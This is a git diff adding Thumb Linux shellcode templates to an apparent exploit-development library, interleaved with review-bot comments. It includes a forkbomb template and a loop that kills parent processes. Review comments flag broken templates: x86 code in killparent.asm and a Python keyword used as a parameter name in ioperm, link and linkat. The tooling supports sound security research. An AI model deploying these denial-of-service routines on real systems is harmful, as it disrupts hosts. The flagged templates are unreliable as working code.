@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchdir.asm b/pwnlib/shellcraft/templates/thumb/linux/fchdir.asm new file mode 100644 index 000000000..bfc7748e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchmod.asm b/pwnlib/shellcraft/templates/thumb/linux/fchmod.asm new file mode 100644 index 000000000..f52f0242e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm b/pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm new file mode 100644 index 000000000..7d14b2cd8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchown.asm b/pwnlib/shellcraft/templates/thumb/linux/fchown.asm new file mode 100644 index 000000000..5966cbb9b --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchownat.asm b/pwnlib/shellcraft/templates/thumb/linux/fchownat.asm new file mode 100644 index 000000000..4935467b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fcntl.asm b/pwnlib/shellcraft/templates/thumb/linux/fcntl.asm new file mode 100644 index 000000000..d01504320 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm b/pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm new file mode 100644 index 000000000..822d6ac82 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/flock.asm b/pwnlib/shellcraft/templates/thumb/linux/flock.asm new file mode 100644 index 000000000..3719a15a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fork.asm b/pwnlib/shellcraft/templates/thumb/linux/fork.asm new file mode 100644 index 000000000..733b4909c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm b/pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm new file mode 100644 index 000000000..20a99073c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm @@ -0,0 +1,13 @@ +<% + from pwnlib.shellcraft.thumb.linux import fork + from pwnlib.shellcraft.common import label +%> +<%docstring> +Performs a forkbomb attack. + +<% + dosloop = label('fork_bomb') +%> +${dosloop}: + ${fork()} + b ${dosloop} diff --git a/pwnlib/shellcraft/templates/thumb/linux/forkexit.asm b/pwnlib/shellcraft/templates/thumb/linux/forkexit.asm new file mode 100644 index 000000000..db8d805da --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/forkexit.asm 
@@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.thumb.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp r0, 1 + blt ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/thumb/linux/fstat.asm b/pwnlib/shellcraft/templates/thumb/linux/fstat.asm new file mode 100644 index 000000000..f5e2cd958 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fstat64.asm b/pwnlib/shellcraft/templates/thumb/linux/fstat64.asm new file mode 100644 index 000000000..e35781cdf --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm b/pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm new file mode 100644 index 000000000..b6e7fc958 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} 
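Review bot: The forkexit.asm docstring "Attempts to fork. If the fork is successful, the parent exits." does not say what happens when fork fails: `cmp r0, 1` / `blt ${dont_exit}` treats every value below 1 — the child's 0 and a negative errno — the same way, so on failure the original process falls through to `${dont_exit}:` and runs the following code as though it were the child. I would extend the docstring with "On failure the calling process continues past the label as if it were the child; no error is reported." The immediate also lacks the `#` prefix the rest of the Thumb code on this page uses (`cmp r0, #1`); GAS tolerates the bare form, but the inconsistency is easy to fix while here.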
diff --git a/pwnlib/shellcraft/templates/thumb/linux/fsync.asm b/pwnlib/shellcraft/templates/thumb/linux/fsync.asm new file mode 100644 index 000000000..e508a4857 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm b/pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm new file mode 100644 index 000000000..db1c3dee8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm new file mode 100644 index 000000000..0917219d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/futimesat.asm b/pwnlib/shellcraft/templates/thumb/linux/futimesat.asm new file mode 100644 index 000000000..2df7cd03c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/futimesat.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getcwd.asm b/pwnlib/shellcraft/templates/thumb/linux/getcwd.asm new file mode 100644 index 000000000..5b9d12ba4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getegid.asm b/pwnlib/shellcraft/templates/thumb/linux/getegid.asm new file mode 100644 index 000000000..917b5e9e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/geteuid.asm b/pwnlib/shellcraft/templates/thumb/linux/geteuid.asm new file mode 100644 index 000000000..bdb958147 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getgid.asm b/pwnlib/shellcraft/templates/thumb/linux/getgid.asm new file mode 100644 index 000000000..4888f7ce3 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/thumb/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getgroups.asm b/pwnlib/shellcraft/templates/thumb/linux/getgroups.asm new file mode 100644 index 000000000..db1b36e43 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getitimer.asm b/pwnlib/shellcraft/templates/thumb/linux/getitimer.asm new file mode 100644 index 000000000..593ae685d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpeername.asm b/pwnlib/shellcraft/templates/thumb/linux/getpeername.asm new file mode 100644 index 000000000..4381a0c2d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpgid.asm b/pwnlib/shellcraft/templates/thumb/linux/getpgid.asm new file mode 100644 index 000000000..1fe8170f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm b/pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm new file mode 100644 index 000000000..c473f32c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpid.asm b/pwnlib/shellcraft/templates/thumb/linux/getpid.asm new file mode 100644 index 000000000..5a4dfc3e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm new file mode 100644 index 000000000..29f75ba17 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getppid.asm b/pwnlib/shellcraft/templates/thumb/linux/getppid.asm new file mode 100644 index 000000000..ab76ee8f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpriority.asm b/pwnlib/shellcraft/templates/thumb/linux/getpriority.asm new file mode 100644 index 000000000..b5afce548 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getresgid.asm b/pwnlib/shellcraft/templates/thumb/linux/getresgid.asm new file mode 100644 index 000000000..a81fcfd77 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getresgid.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getresuid.asm b/pwnlib/shellcraft/templates/thumb/linux/getresuid.asm new file mode 100644 index 000000000..a67e28498 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm b/pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm new file mode 100644 index 000000000..bc248e20f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getrusage.asm b/pwnlib/shellcraft/templates/thumb/linux/getrusage.asm new file mode 100644 index 000000000..f6f324ea5 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getrusage.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getsid.asm b/pwnlib/shellcraft/templates/thumb/linux/getsid.asm new file mode 100644 index 000000000..43a839957 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getsockname.asm b/pwnlib/shellcraft/templates/thumb/linux/getsockname.asm new file mode 100644 index 000000000..91de286ac --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm b/pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm new file mode 100644 index 000000000..e11e47560 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm new file mode 100644 index 000000000..b4f367f96 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getuid.asm b/pwnlib/shellcraft/templates/thumb/linux/getuid.asm new file mode 100644 index 000000000..18a94f090 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/gtty.asm b/pwnlib/shellcraft/templates/thumb/linux/gtty.asm new file mode 100644 index 000000000..d43157d9a --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/ioctl.asm b/pwnlib/shellcraft/templates/thumb/linux/ioctl.asm new file mode 100644 index 000000000..e859f870f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ioperm.asm b/pwnlib/shellcraft/templates/thumb/linux/ioperm.asm new file mode 100644 index 000000000..30a9eb3eb --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/iopl.asm b/pwnlib/shellcraft/templates/thumb/linux/iopl.asm new file mode 100644 index 000000000..d1e4b2dee --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/kill.asm b/pwnlib/shellcraft/templates/thumb/linux/kill.asm new file mode 100644 index 000000000..0af8cff27 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/kill.asm 
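Review bot: `<%page args="from, num, turn_on"/>` in ioperm.asm uses the Python keyword `from` as a parameter name; Mako turns the page args into the parameter list of the generated render function, so this template fails with a SyntaxError the first time it is compiled rather than producing any code. link.asm (`from, to`) and linkat.asm (`fromfd, from, tofd, to, flags`) two lines down have the same defect. Renaming the parameter to `from_` in the page args, in the Arguments docstring entry and in the `${syscall(...)}` call fixes all three; if these templates came out of a generator, the rename belongs there too so regeneration does not reintroduce the keyword.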
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/killparent.asm b/pwnlib/shellcraft/templates/thumb/linux/killparent.asm new file mode 100644 index 000000000..95b30d9c8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/killparent.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.thumb.linux import getppid, kill + from pwnlib.constants import SIGKILL + from pwnlib.shellcraft.common import label +%> +<%docstring> +Kills its parent process until whatever the parent is (probably init) +cannot be killed any longer. + +<% + killparent_loop = label('killparent') +%> +${killparent_loop}: + ${getppid()} + ${kill('eax', SIGKILL)} + test eax, eax + jz ${killparent_loop} diff --git a/pwnlib/shellcraft/templates/thumb/linux/lchown.asm b/pwnlib/shellcraft/templates/thumb/linux/lchown.asm new file mode 100644 index 000000000..2a9cc79d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/link.asm b/pwnlib/shellcraft/templates/thumb/linux/link.asm new file mode 100644 index 000000000..57da5942a --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/link.asm 
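Review bot: killparent.asm sits under thumb/linux but its body is x86: `${kill('eax', SIGKILL)}`, `test eax, eax` and `jz ${killparent_loop}` will not assemble as Thumb, and `eax` is not a register the ARM `kill` template can resolve. It looks like a verbatim copy of the i386 template; on ARM the `getppid` result arrives in r0, so the kill argument should be `r0` and the `test`/`jz` pair should become the `cmp`/conditional-branch form that forkexit.asm on this page already uses. A sentence in the docstring noting that the loop ends when `kill` stops returning 0 would also make the stop condition explicit.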
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/linkat.asm b/pwnlib/shellcraft/templates/thumb/linux/linkat.asm new file mode 100644 index 000000000..e82f796a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/loader.asm b/pwnlib/shellcraft/templates/thumb/linux/loader.asm new file mode 100644 index 000000000..87fa31544 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/loader.asm 
